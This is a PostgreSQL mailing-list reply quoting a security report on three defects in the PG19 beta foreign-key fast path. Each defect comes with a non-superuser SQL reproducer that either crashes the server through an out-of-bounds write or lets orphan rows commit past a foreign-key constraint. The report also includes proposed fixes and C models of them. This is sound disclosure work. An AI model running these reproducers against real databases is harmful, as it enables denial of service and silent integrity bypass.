Re: PG19 FK fast path: OOB write and missed FK checks during batched

Amit Langote Sat, 06 Jun 2026 02:13:48 -0700

On Sat, Jun 6, 2026 at 17:31 Nikolay Samokhvalov <[email protected]> wrote:


> Hi hackers,
>
>
> The new FK existence-check fast path in ri_triggers.c (ri_FastPath*) runs
> user-defined code in the middle of a deferred batch flush, which yields at
> least three defects reachable by an unprivileged table owner. Present in
> master and verified in REL_19_BETA1.
>
>
> I identified these issues during recent security research with LLMs. While
> they have clear security implications (OOB write, integrity bypass), I am
> reporting them here because they are isolated to 19beta1 and absent in PG18
> and earlier. I don't have patches, only reproducers.
>
>
> Mechanism:
>
>
> For an INSERT/UPDATE on the referencing side the fast path buffers rows
> in a transaction-lived cache (ri_fastpath_cache, keyed by pg_constraint
> OID) and probes the PK index in groups, flushing when a per-constraint
> buffer reaches RI_FASTPATH_BATCH_SIZE (64) or when the trigger-firing pass
> ends (ri_FastPathEndBatch, an AfterTriggerBatchCallback). For a cross-type
> FK the flush calls the column's cast function (ri_FastPathFlushArray, the
> FunctionCall3 at line 3069) and the equality operator -- arbitrary user
> code, mid-flush.  Line numbers below are from a REL_19_BETA1 build (commit
> 4b0bf07).
>
>
> Unprivileged vehicle (defects 1 and 3).  No superuser, no contrib: a role
> creates a type it owns and an IMPLICIT cast from it to the PK type with a
> PL/pgSQL function, which ri_HashCompareOp wires into the fast path's cast
> slot. The examples below use a composite type. Default btree opclass,
> ordinary single-column FK, no GUC (fast path is unconditional for
> non-partitioned, non-temporal FKs, per ri_fastpath_is_applicable).
>
>
>
> 1) ri_FastPathBatchAdd (line 2859): out-of-bounds write on re-entry
>
>
> The write precedes the bound check, and batch_count is reset to 0 only at
> end of flush (ri_FastPathBatchFlush, line 2971), so it is 64 throughout a
> full-batch flush:
>
>
>     fpentry->batch[fpentry->batch_count] = ExecCopySlotHeapTuple(newslot);
>     fpentry->batch_count++;
>     if (fpentry->batch_count >= RI_FASTPATH_BATCH_SIZE)
>         ri_FastPathBatchFlush(fpentry, fk_rel, riinfo);
>
>
> There is no re-entrancy guard and ri_FastPathGetEntry returns the same
> entry, so user code that does DML on the same table during a full-batch
> flush re-enters with batch_count == 64 and writes batch[64], one past the
> array, overwriting the adjacent batch_count field (struct layout, lines
> 250-251). A single re-entrant row only stomps batch_count, which is then
> reset to 0 before reuse; the crash manifests once the re-entrant insert is
> itself large enough to fill and flush a batch, so the stomped batch_count
> is used as an array index (batch[garbage]) and as nvals in memset(matched,
> 0, nvals * sizeof(bool)) (line 3054).
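
To make the re-entry described above concrete, here is a minimal standalone C model. It is not PostgreSQL code: Entry, batch_add, batch_flush and run_demo are hypothetical names, the batch holds plain ints rather than HeapTuples, and the "user code" is simulated by a hard-coded re-entrant call. It sketches one possible shape of a guarded add (flag checked first, bound checked before the write), under the assumption that a re-entrant row may simply be refused or handled elsewhere.

```c
#include <assert.h>
#include <stdbool.h>

#define BATCH_SIZE 64               /* mirrors RI_FASTPATH_BATCH_SIZE in the report */

typedef struct Entry
{
    int  batch[BATCH_SIZE];         /* stand-in for the buffered tuples */
    int  batch_count;
    bool flushing;                  /* hypothetical guard flag */
    int  flushed;                   /* model bookkeeping: rows probed */
    int  rejected;                  /* model bookkeeping: re-entrant rows refused */
} Entry;

static void batch_add(Entry *e, int row);

/* Probe every buffered row; row value 64 simulates a cast function doing DML
 * on the same table, which re-enters batch_add for the same entry. */
static void batch_flush(Entry *e)
{
    e->flushing = true;
    for (int i = 0; i < e->batch_count; i++)
    {
        e->flushed++;
        if (e->batch[i] == 64)
            batch_add(e, 1001);     /* re-entry while batch_count is still 64 */
    }
    e->batch_count = 0;             /* reset only at end of flush, as in the report */
    e->flushing = false;
}

static void batch_add(Entry *e, int row)
{
    /* Guard first: a busy entry must not be modified. A real fix would have
     * to raise an error or check the row some other way; here we only count. */
    if (e->flushing)
    {
        e->rejected++;
        return;
    }

    /* Bound check before the write, so batch[BATCH_SIZE] is never touched. */
    assert(e->batch_count < BATCH_SIZE);
    e->batch[e->batch_count++] = row;

    if (e->batch_count >= BATCH_SIZE)
        batch_flush(e);
}

/* Insert rows 1..64, which fills exactly one batch and triggers one flush. */
static Entry run_demo(void)
{
    Entry e = {0};

    for (int g = 1; g <= 64; g++)
        batch_add(&e, g);
    return e;
}
```

In this model run_demo() ends with flushed == 64, rejected == 1 and batch_count == 0: the re-entrant row is refused instead of being written to batch[64]. Without the flushing test, the same call sequence would reach the write with batch_count == 64, which is the out-of-bounds store from the report.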
>
>
> Reproduction (non-superuser; reliable SIGSEGV on --enable-cassert -O0;
> under -O2 the out-of-bounds write is of undefined effect):
>
>
>     create table parent(id int primary key);
>     insert into parent select g from generate_series(1,2000) g;
>     create type vch as (v int);
>     create function vcast(vch) returns int language plpgsql as $$
>     begin
>       if $1.v = 64 then
>         insert into child select row(g)::vch from generate_series(1001,1064) g;
>       end if;
>       return $1.v;
>     end$$;
>     create cast (vch as int) with function vcast(vch) as implicit;
>     create table child(a vch);
>     alter table child add constraint child_fkey
>       foreign key (a) references parent(id);
>     insert into child select row(g)::vch from generate_series(1,64) g;  -- crash
>     -- gdb: crash at ri_FastPathBatchAdd line 2866 with batch_count holding a
>     -- stomped HeapTuple pointer's low bits, i.e. batch[64] overwrote
>     -- batch_count; backend SIGSEGVs and the cluster restarts.
>
>
>
> 2) ri_FastPathSubXactCallback (line 4208): batch dropped on subxact abort
>
>
> On SUBXACT_EVENT_ABORT_SUB the callback discards the whole cache:
>
>
>     ri_fastpath_cache = NULL;
>     ri_fastpath_callback_registered = false;
>
>
> But batch[] holds outstanding rows of the enclosing transaction, not the
> aborting subxact. An internal subxact abort during after-trigger firing
> (PL/pgSQL BEGIN ... EXCEPTION) drops the buffered rows unflushed; their FK
> checks never run and orphans commit behind a constraint that still reports
> itself valid. No cast needed:
>
>
>     create table pk(id int primary key);
>     create table fk(a int, tag text);
>     insert into pk select g from generate_series(1,10) g;
>     alter table fk add constraint fk_a_fkey foreign key (a) references pk(id);
>     create function abort_subxact() returns trigger language plpgsql as $$
>     begin
>       if NEW.tag = 'boom' then
>         begin perform 1/0; exception when others then null; end;
>       end if;
>       return NEW;
>     end$$;
>     create trigger fk_after after insert on fk
>       for each row execute function abort_subxact();
>     insert into fk values (999,'bad'),(0,'boom'),(1,'ok'),(2,'ok'),(3,'ok');
>     -- INSERT 0 5, no error
>     select f.a from fk f left join pk p on f.a=p.id where p.id is null;
>     --  a
>     -- -----
>     -- 999
>     --   0   (orphans)
>
>     -- the constraint still reports itself valid, and re-validation passes
>     -- while the orphans remain:
>     select convalidated from pg_constraint where conname = 'fk_a_fkey';
>     -- convalidated
>     -- --------------
>     -- t
>     alter table fk validate constraint fk_a_fkey;
>     -- ALTER TABLE   (succeeds; does not re-scan committed rows)
>     select f.a from fk f left join pk p on f.a=p.id where p.id is null;
>     -- 999, 0  (orphans still present)
>
>
> Controls (no EXCEPTION; between-statement SAVEPOINT; DEFERRABLE INITIALLY
> DEFERRED) all behave correctly (FK violation raised, no orphans). The whole
> statement's buffered batch is discarded, not just the aborting row's check.
> The abort path also emits "WARNING: resource was not closed" (relation /
> index / TupleDesc), a resource leak consistent with the missing flush.
>
>
>
> 3) ri_FastPathEndBatch (line 4133): cross-table re-entry drops a check
>
>
> EndBatch flushes by iterating the cache with hash_seq_search (line 4143).
> If flush-time user code INSERTs into a different fast-path FK table,
> ri_FastPathGetEntry adds a new cache entry mid-scan; it can land in a
> bucket hash_seq_search already passed and is never reached.
> ri_FastPathTeardown (line 4165) then hash_destroys the cache (line 4188)
> without flushing entries that still have batch_count > 0, so that buffered
> check is discarded. This survives a per-entry guard for [1] (different
> entry, not a re-entry of the busy one):
>
>
>     create table parent(id int primary key);
>     insert into parent select g from generate_series(1,64) g;
>     create table child2(a int);
>     alter table child2 add constraint child2_fkey
>       foreign key (a) references parent(id);
>     create type vch as (v int);
>     create function vcast(vch) returns int language plpgsql as $$
>     begin
>       if $1.v = 1 then
>         insert into child2 values (999999);   -- orphan into a *different* FK
>       end if;
>       return $1.v;
>     end$$;
>     create cast (vch as int) with function vcast(vch) as implicit;
>     create table child(a vch);
>     alter table child add constraint child_fkey
>       foreign key (a) references parent(id);
>     insert into child values (row(1)::vch);    -- flushed at ri_FastPathEndBatch
>     select a from child2 where a not in (select id from parent);  -- => 999999
>     -- control: INSERT INTO child2 VALUES (999999); -- correctly raises FK error
>
>
>
> Root cause / thoughts:
>
>
> All three stem from invoking user cast/operator code inside a deferred
> batch flush: while a per-entry batch is half-updated [1], while a
> cache-wide hash_seq_search is in progress and teardown drops non-empty
> entries [3], and against a subxact-abort invalidation that cannot tell
> parent-xact rows from aborted-subxact rows [2].
>
>
> - [1] Bound-check before the write in ri_FastPathBatchAdd, and add a
> "flushing" flag to RI_FastPathEntry, rejecting re-entrant modification of
> a busy entry (a nested per-row probe is unsafe: the flush may hold PK-index
> buffer locks).
>
> - [3] Loop-flush in ri_FastPathEndBatch until no entry has batch_count >
> 0, and/or flush non-empty entries in ri_FastPathTeardown before
> hash_destroy.
>
> - [2] Do not discard outstanding parent-xact rows on
> SUBXACT_EVENT_ABORT_SUB; track the buffering subxact, or flush
> immediate-constraint batches at subxact boundaries.
>
> - Unifying: a global "in fast-path flush" guard routing any re-entrant FK
> check to the immediate per-row path, and reconsidering running user code
> mid-flush at all.
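
The loop-flush idea in [3] can be sketched with a small standalone C model. This is an illustration under stated assumptions, not PostgreSQL code: the cache is a fixed two-slot array rather than a dynahash table, and Entry, flush_entry, end_batch_single_pass, end_batch_until_quiescent and total_pending are hypothetical names. Flushing slot 1 simulates user code that buffers a new row in slot 0, which a front-to-back scan has already passed.

```c
#include <assert.h>
#include <stdbool.h>

#define N_ENTRIES 2

typedef struct Entry
{
    int pending;                    /* buffered rows awaiting their FK probe */
    int checked;                    /* rows whose probe has run */
} Entry;

/* Flush one slot. The first flush of slot 1 has a side effect: it buffers a
 * row in slot 0, standing in for flush-time user code that inserts into a
 * different FK table. */
static void flush_entry(Entry *cache, int idx, bool *side_effect_done)
{
    cache[idx].checked += cache[idx].pending;
    cache[idx].pending = 0;

    if (idx == 1 && !*side_effect_done)
    {
        cache[0].pending++;
        *side_effect_done = true;
    }
}

/* One pass over the cache: rows added behind the scan position are missed. */
static void end_batch_single_pass(Entry *cache, bool *side_effect_done)
{
    for (int i = 0; i < N_ENTRIES; i++)
        if (cache[i].pending > 0)
            flush_entry(cache, i, side_effect_done);
}

/* Rescan until a full pass finds nothing left to flush. */
static void end_batch_until_quiescent(Entry *cache, bool *side_effect_done)
{
    bool again;

    do
    {
        again = false;
        for (int i = 0; i < N_ENTRIES; i++)
        {
            if (cache[i].pending > 0)
            {
                flush_entry(cache, i, side_effect_done);
                again = true;
            }
        }
    } while (again);
}

/* Rows still buffered, i.e. checks that teardown would silently discard. */
static int total_pending(const Entry *cache)
{
    int n = 0;

    for (int i = 0; i < N_ENTRIES; i++)
        n += cache[i].pending;
    return n;
}
```

Starting from slot 0 empty and slot 1 holding one row, the single-pass variant leaves one row pending, while the rescanning variant leaves none. The model terminates because the side effect fires only once; real user code could keep adding rows on every flush, so an actual fix would presumably need either a bound on rescans or the guard from [1] to refuse such inserts.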
>
>
> Nik
>

Thanks for the detailed report and reproducers. I’ve started looking into
this.

- thanks, Amit
